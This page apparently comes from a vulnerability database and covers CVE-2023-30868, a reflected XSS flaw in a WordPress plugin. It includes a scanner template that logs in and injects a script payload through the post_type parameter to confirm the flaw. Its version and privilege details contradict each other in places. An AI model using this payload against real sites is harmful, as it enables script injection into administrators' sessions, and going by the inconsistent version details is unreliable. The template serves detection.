| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| Tree Page View Plugin 1.6.7 - Cross Site Scripting Vulnerability | 6 Jun 202300:00 | – | zdt | |
| WordPress plugin CMS Tree Page View 跨站脚本漏洞 | 18 May 202300:00 | – | cnnvd | |
| CVE-2023-30868 | 18 May 202308:28 | – | cve | |
| CVE-2023-30868 WordPress CMS Tree Page View Plugin <= 1.6.7 is vulnerable to Cross Site Scripting (XSS) | 18 May 202308:28 | – | cvelist | |
| Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS) | 6 Jun 202300:00 | – | exploitdb | |
| CVE-2023-30868 | 18 May 202309:15 | – | nvd | |
| WordPress CMS Tree Page View Plugin < 1.6.8 XSS Vulnerability | 12 Sep 202300:00 | – | openvas | |
| CVE-2023-30868 | 18 May 202309:15 | – | osv | |
| WordPress Tree Page View 1.6.7 Cross Site Scripting | 6 Jun 202300:00 | – | packetstorm | |
| WordPress CMS Tree Page View Plugin <= 1.6.7 is vulnerable to Cross Site Scripting (XSS) | 24 Apr 202300:00 | – | patchstack |
id: CVE-2023-30868
info:
name: Tree Page View Plugin < 1.6.7 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.
impact: |
Authenticated high-privilege attackers (admin) can inject malicious JavaScript through the post_type parameter to compromise other administrator accounts and gain persistent access to the WordPress site.
remediation: |
Update CMS Tree Page View plugin to version 1.6.7 or later that properly escapes the post_type parameter in the admin interface to prevent reflected XSS attacks.
reference:
- https://www.exploit-db.com/exploits/51507
- https://wpscan.com/vulnerability/407c62af-8e2d-441d-8332-0afad5d07014
- https://nvd.nist.gov/vuln/detail/CVE-2023-30868
- http://packetstormsecurity.com/files/172730/WordPress-Tree-Page-View-1.6.7-Cross-Site-Scripting.html
- https://patchstack.com/database/vulnerability/cms-tree-page-view/wordpress-cms-tree-page-view-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-30868
cwe-id: CWE-79
epss-score: 0.03995
epss-percentile: 0.89271
cpe: cpe:2.3:a:cms_tree_page_view_project:cms_tree_page_view:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: cms_tree_page_view_project
product: cms_tree_page_view
framework: wordpress
tags: cve2023,cve,wpscan,packetstorm,xss,wp,wordpress,authenticated,exploitdb,cms_tree_page_view_project,vuln
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E") && contains(body_2, "CMS Tree Page View")'
- 'status_code_2 == 200'
condition: and
# digest: 4b0a00483046022100c2c127ee47ccf5a8111b163d2bd98fb7a03fc283c360ab1ba79f671943845ac8022100b5c37319069b9060045797cd2eb3ebed886534eca7ece0ee17d2f9f8ce9a5302:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation